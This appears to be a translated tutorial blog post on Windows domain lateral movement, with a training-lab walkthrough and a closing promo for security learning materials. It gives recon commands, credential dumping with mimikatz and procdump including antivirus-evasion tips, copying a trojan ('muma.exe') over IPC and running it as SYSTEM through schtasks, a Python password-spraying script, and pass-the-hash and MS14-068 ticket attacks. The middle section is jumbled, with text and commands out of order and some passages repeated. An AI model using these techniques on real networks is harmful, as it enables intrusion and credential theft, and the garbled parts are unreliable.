0x00 Preface
Intranet penetration is mainly based on the early peripheral management of the webserver with getshell. By collecting information on the webserver, it then conducts password attacks on other intranet hosts. Of course, there are also some attacks based on vulnerabilities.
Concepts related to the intranet will not be introduced here. You can search on your own, such as what is a domain, the difference between a domain and a workgroup, what is a DC, what is an AD, etc. Of course, the concept is unfamiliar and difficult to understand, and it will be helpful to understand it when combined with the actual environment. Detailed tutorial on an intranet shooting range: Vulnstack (1)
The process of intranet penetration often involves intranet penetration. How to understand intranet penetration, port forwarding, port mapping and other related knowledge can be referred to: How to build an understanding of intranet penetration from scratch.
The practical part is written rather hastily, mainly to enhance cognition, expand ideas, and expand knowledge. In fact, there are many excellent integrated tools, and these methods are rarely used separately. Of course, in most cases, you need to consider avoiding killing. When avoiding killing, you may split a certain step of the operation into separate killing and exploiting.
0x01 Information Collection
View detailed system information, such as OS version and patch installation status, and filter exploitable vulnerabilities based on this information:
systeminfo
Check the startup process, and you can determine the role of the host in the domain based on the startup process:
net start
View the process list:
tasklist
Check the port opening status:
netstat -ano
Determine whether the domain exists:
net view /domain
View host name, domain DNS, IP:
ipconfig /all
View hosts in the domain:
net view
The hosts in the domain are based on the domain server time, so this command can be used to determine the DC:
net time /domain
View IP:
nslookup domain name
View login information:
net config workstation
View user information:
whoami /all
View the users in the domain and use it as a dictionary to crack the passwords of other hosts:
net user /domain
This command can be executed directly on the DC, and executed on other domain hosts to open the RPC service of the DC.
Survival hosts in the probe domain:
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
Of course, you can also use third-party tools such as nmap and masscan or third-party scripts such as empire and nishang, but the biggest advantage of using system commands is that you don’t have to worry about avoiding killing.
There is actually another machine STU1 in the domain, but it has a firewall turned on, so ping is prohibited. This may be the reason why STU1 is not displayed in the previous net view. Let’s turn off the firewall and try again:
-
Computer user Hash and plain text acquisition:
mimikatz: Win; mimipenguin: Linux.
-
Obtaining various computer protocols and service passwords:
LaZagne: Available for Windows, Linux, Mac. Broad support, but average functionality.
XenArmor: Win, paid.
-
Detect the surviving hosts and address information in the domain:
Built-in internal commands (.bat), nmap, masscan, powershell third-party scripts: empire, nishang.
It should be noted that Mimikatz is a third-party software. Directly uploading it to the target host may be detected by anti-virus software. At this time, we can cooperate with the official software Procdump to upload Procdump to the target host to obtain user information (the file is unreadable), and use the local Mimikatz opens the user information obtained by Procdump.
mimikatz download:
https://github.com/gentilkiwi/mimikatz/releases
procdump download:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
0x02 IPC & amp;SMB & amp;WMI
As mentioned before, intranet penetration is mainly a password-based attack. There are countless hosts and domain users in the same domain. In order to facilitate memory and management, many domain members have overlapping passwords. When we get the password of a domain member, we can use it to tear the hole bigger and bigger, continuously enrich our password dictionary, and then continue to blast the hosts in the domain until we capture the DC.
Windows provides many protocols and related functions that we can utilize to pass the user’s credentials for verification.
1. SMB protocol
SMB A client/server, request/response protocol. Through the SMB protocol, client applications can read and write files on the server in various network environments, and make service requests to the server program. In addition, through the SMB protocol, applications can access files on the remote server, as well as resources such as printers, mailslots, and named pipes.
In a TCP/IP environment, clients connect to the server through NetBIOS over TCP/IP (or NetBEUI/TCP or SPX/IPX). Once the connection is successful, the client can send the SMB
commands to the server so that the client can access shared directories, open files, read and write files, and everything else that can be done on the file system.
Let’s put it this way, what is the most important thing in the domain? One is to ensure security (the internal network is isolated from the external network), and the other is resource sharing. After all, everyone is in the same boat. The SMB protocol is used to share various resources, including named pipes in IPC connections.
In Windows NT SMB is implemented based on NBT. In Windows 2000, in addition to NBT-based implementation, SMB is also implemented directly through port 445. NBT (NetBIOS over TCP/IP): Use 137, 138 (UDP) and 139 (TCP) to implement NETBIOS Internet interconnection based on TCP/IP.
My understanding is that 445 is an upgrade of 139. The implementation conditions of 139 are more stringent than 445, but both are for realizing the SMB protocol, so the two do not conflict. In Windows NT, SMB is implemented based on NBT, that is, using port 139 (TCP); in Windows 2000, in addition to being based on NBT, SMB can also be implemented directly through port 445.
2. IPC
IPC (Inter-Process Communication), inter-process communication refers to the interaction between data of two processes. The main methods of inter-process communication include shared memory, message queue, pipeline, etc. Shared memory is mainly used for inter-process communication within the same computer, and message queues and pipes are mainly used in distributed environments (communication processes are located on different computers connected through the network).
“Named Pipes”, also known as “Named Pipes”, is a simple inter-process communication (IPC) mechanism, and most Microsoft Windows provide support for it (but not including Windows CE). Named pipes support reliable, one-way or two-way data communication between different processes on the same computer or between different processes on different computers across a network. An important reason why named pipes are recommended as a process communication solution is that they take full advantage of Windows’ built-in security features (ACL, etc.).
Like TCP/IP (Transmission Control Protocol or Internet Protocol), named pipes are a communications protocol. It is generally used in local area networks because it requires the client to have permission to access server resources (SMB protocol).
In a fast local area network (LAN) environment, Transmission Control Protocol or Internet Protocol (TCP/IP) socket clients and Named Pipes clients have comparable performance. But the slower the network, the more pronounced the performance difference between the TCP/IP Sockets client and the Named Pipes client. This is because TCP/IP socket data transfer is more efficient and has less overhead. Data transfers can also take advantage of TCP/IP socket performance enhancement mechanisms such as windowing, delayed acknowledgments, etc., which can be very beneficial on slow networks. With named pipes, network communication is generally more interactive. One peer does not send data until another peer requests the data using a read command. A network read typically involves a series of peeks into the named pipe before starting to read the data. This can be very costly on a slow network and cause excessive network traffic, which in turn affects other network clients.
There are generally two reasons for using named pipes:
- Improve speed: Assuming that it is also in the local area network, then using the named pipe protocol will be faster than the TCP/IP protocol.
- Increased security: Because named pipes can only be used on LAN, if the server turns off the TCP/IP protocol and only enables named pipes, some security risks can be avoided.
To summarize, FIFOs are resources that share “named pipes”. They are named pipes that are open for inter-process communication. By providing trusted usernames and passwords, both parties can establish a secure channel and use this channel to encrypt data. exchange to provide access to remote computers. Therefore, we can use this to crack usernames and passwords. It should be noted that IPC$ requires support for port 139 or 445.
3. WMI
Windows Management Instrumentation (WMI) consists of a set of extensions to the Windows driver model. WMI allows scripting languages, such as VBScript or Windows PowerShell, to locally or remotely manage Microsoft Windows PCs and servers.
To put it simply, the command line language we use in cmd or powershell is supported by WMI. It provides us with an interface such as powershell to facilitate our computer management.
When it comes to remote management, several more important ports are extended, such as 22, 23, 135, 139, 445, 3389, etc. We have already discussed ports 139 and 445 before. Port 22 is Linux ssh, port 23 is telnet, and 3389 is remote desktop connection rdp. These are relatively easy to understand. Let’s focus on port 135.
Port 135 is mainly used to use the RPC (Remote Procedure Call) protocol and provide DCOM (Distributed Component Object Model) services. RPC can ensure that programs running on one computer can successfully execute code on the remote computer. ;Using DCOM, you can communicate directly through the network and can transmit a variety of networks including HTTP protocol.
Inter-process communication (IPC) is a communication technology used by programs and processes running between multi-tasking operating systems or networked computers. There are two types of inter-process communication (IPC).
Local Procedure Call (LPC): LPC is used in multitasking operating systems to enable concurrently running tasks to talk to each other. These tasks share memory space allowing tasks to synchronize and send information to each other.
Remote Procedure Call (RPC): RPC is similar to LPC, except it works online. RPC began to appear in computers running the UNIX operating system from Sun Microsystems and HP.
Simply put, RPC is used to support remote IPC connections. Whether it is a local connection or a remote connection, it must rely on the VMI service for management.
4. Summary
The SMB protocol is used to achieve sharing, and IPC is used to establish a connection. How to share without a connection? As mentioned earlier, sharing includes named pipes, and named pipes are the connection method. Therefore, sharing of the SMB protocol actually includes IPC. Not only that, it also relies on IPC connections. But in the final analysis, remote management of connected computers still relies on VMI.
0x03 at & amp;schtasks
at & schtasks is used to create scheduled tasks, where at
Utilization scenario:
You have obtained the authority of a host in the intranet (webserver), know the domain username and password of the host, and know the names of other users in the domain.
Utilization process:
1. Establish an IPC connection to the target host (clear text password)
2.Copy the command script to be executed to the target host
3. Check the target time and create a script for scheduled tasks (at, schtasks) to execute copy regularly.
4. Delete IPC connection
View current network connection:
net use
Use the clear text password hongrisec@2021 to establish a remote IPC connection with the god\administrator user at 192.168.52.143:
net use \192.168.52.143\ipc$ "hongrisec@2021" /user:god\administrator
First upload the malicious file to the webserver that was granted permission during peripheral management, and then copy the malicious file from the webserver to the target host through the remote IPC connection established previously:
copy C:\Users\liukaifeng01\Desktop\muma.exe \192.168.52.143\C$
For versions below Windows 2012, add timing tasks: 2. schtasks>=Windows2012 For Windows 2012 and above, create a file corresponding to the timing task: Run the adduser task: Delete adduser task: 3.impacket impacket is a packaged toolkit that contains exploitation tools for various protocols and system commands. For at&schtasks, we can use atexec.exe from impacket, using which we can easily connect remotely and execute system commands. https://github.com/SecureAuthCorp/impacket exe version impacket download: https://gitee.com/RichChigga/impacket-examples-windows In actual combat, when we take down the webserver and obtain the password on the webserver as well as all domain users, local users, and IPs of surviving hosts in the domain, we can use the user as the user dictionary, the IP as the IP dictionary, and the password as the password dictionary , perform batch connections (collision), and detect which hosts can be successfully connected. Once connected successfully, it means that we can obtain the connected host permissions through scheduled tasks and other methods. After obtaining the new host permissions, we can obtain the new host password, then enrich our password dictionary, and then perform batch connections (collision). Repeat until the DC is obtained. As shown in the figure above, you can only traverse one variable using the bat script. If you want to traverse three variables at the same time, you can use python. For example, create three lists, use three loops to traverse, loop to generate command execution statements (string), and finally use the os.system() function in the python os module to execute system commands. However, it should be noted that there is probably no Python environment on the host in the domain, so we need to use the pyinstaller module in Python, which can package the py script into an executable file and run it directly on Windows: The idea of utilization remains unchanged, only the commands have changed. Another thing to note is that the official does not support hash connection. If you want to use hash connection (only hash can be obtained), you can use the impacket toolkit, but you must avoid killing. Sharing is required 139 / 445 The opening of the port, in addition to this, is also inseparable from the 135 port because 135 Port is used to support remote I P C Established. I P C Sharing requires the opening of port 139/445. In addition, port 135 is also inseparable, because port 135 is used to support remote IPC establishment. IPC Sharing requires the opening of port 139/445. In addition, port 135 is also inseparable, because port 135 is used to support remote IPC establishment. The purpose of IPC sharing is to facilitate remote operation and management by administrators, but we can use the echo during verification to conduct password blasting. PTH: pass the hash (LM, NTLM) PTK: pass the key (AES 256) PTT: pass the ticket Windows 2012 and above versions turn off wdigest by default, so attackers cannot obtain clear text passwords from memory. If you install the KB2871997 patch for versions below Windows 2012, it will also result in the inability to obtain clear text passwords. In response to the above situation, we provide the following solutions: 1. Use hash transfer (pth, ptk, etc.) to move
1. atat \192.168.52.143 15:30 C:\muma.exe
schtasks /create /s 192.168.52.143 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.exe /F
schtasks /run /s 192.168.52.143 /tn adduser
schtasks /delete /s 192.168.52.143 /tn adduser
Python version of impacket download:pip install pyinstaller
pyinstaller -F app.py
import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.31',
'192.168.3.33'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'vpnadm',
'webadmin'
}
passes={
'admin',
'admin!@#45',
'Admin12345'
}
for ip in ips:
for user in users:
for mima in passes:
exec="net use " + "" + ip + '\ipc$ ' + mima + ' /user:god' + user
print('--->' + exec + '<---')
os.system(exec)
time.sleep(1)
0x04 smb & amp;wmi
psexec is a tool in Microsoft’s official pstools, so there is no need to consider anti-killing. As mentioned in the above figure, the second method of psexec and smbexec do not need to establish an IPC connection, which I think is unreasonable. These methods only have different commands. When providing a plaintext account password, an IPC connection must also be established, because this application is based on IPC sharing.
I personally think that there is no difference between the methods introduced earlier. They are all based on IPC.0x05 pth & amp;ptk & amp;ptt
2. Use registry operations to enable Wdigest Auth value to obtain
3. Use tools or third-party platforms (Hashcat) to crack and obtain
Windows authentication uses LM Hash and NTLM Hash encryption algorithms. For personal systems after Windows vista and server systems after Windows 2003, the authentication method is NTLM Hash.
If you only get the Hash, you can either try to crack it locally or use the impacket introduced earlier. The tools in impacket can pass hashes and directly execute system commands. Advantages: built-in privilege escalation, simple commands, and powerful functions. Disadvantages: Unofficial tool, easy to be killed.
Both PTH and PTK can be obtained and attacked using mimikatz. I won’t go into details here. Use Baidu for mimikatz related information.
Download hash cracking tool hashcat: https://github.com/hashcat/hashcat
It should be noted that ptk can only be used with a patch (KB2871997).
The part of the PTT attack is not simple NTLM authentication, it uses the Kerberos protocol to attack.
The specific working method of the Kerberos protocol, in the domain, is briefly introduced:
1. The client performs an NTLM hash of the plaintext password and then encrypts it together with the timestamp (using
krbtgt password hash as key), sent to kdc (domain control), kdc checks the user
Test and create TGT (Ticket-Granting Ticket) after success.
2. Return the TGT to the client machine with an encrypted signature, which can only be read by the domain user krbtgt
Get TGT data in kerberos
3. The client then sends the TGT to the domain controller KDC to request the TGS (Ticket Grant Service).
service) ticket and detect the TGT
4. After the detection is successful, encrypt the NTLM and TGT of the target service account, and
The encrypted result is returned to the client.
To put it bluntly, tickets are just like cookies. We need to obtain fresh cookies (not expired, expires about ten hours after the host logs in), then inject them into the memory and pass the authentication through disguise.
This can be exploited through vulnerability POC or tools, download MS14-068:
https://github.com/abaatchy17/WindowsExploits/tree/master/MS14-068
Tool kekeo download:
https://github.com/gentilkiwi/kekeo/releases
0x05 Reference
Named pipes in SQL Server and their uses
Inter-process communication (IPC): Detailed explanation of the principles of shared memory and message queues
Named pipe TCP/IP protocol Anonymous pipe
Windows System Security | IPC
Sharing and other sharing
(
C
Shares and other shares (C
Shares and other shares (C, D
,
A
d
m
i
n
,Admin
,Admin)
Finally
From the perspective of the development of the times, there is endless knowledge to learn about network security, and there will be more to learn in the future. Students must correct their mentality. Since they choose to get started with network security, it should not just be the entry level. The stronger the ability. The more opportunities there are.
Because the knowledge points in the introductory learning stage are relatively complex, I will talk more generally. If you have anything you don’t understand, you can ask me for consultation. I promise that I will explain everything you know. If you need relevant information, you can also ask me, my network disk A lot of information in it is gathering dust.
The dry goods mainly include:
①1000+ CTF question bank from previous years (mainstream and classic ones should be included)
②CTF technical documentation (the most complete Chinese version)
③Project source code (forty or fifty interesting and classic practice projects and source code)
④ Videos on CTF competition, web security, and penetration testing (suitable for beginners to learn)
⑤ Network security learning roadmap (say goodbye to substandard learning)
⑥ Complete collection of CTF/penetration testing tool image files
⑦ 2023 Cryptography/Invisibility/PWN Technical Manual
If you are interested in getting started with network security, you can click here if you need it Big benefits of network security: Getting started & advanced full set of 282G learning resource package to share for free!
Scan the QR code to receive
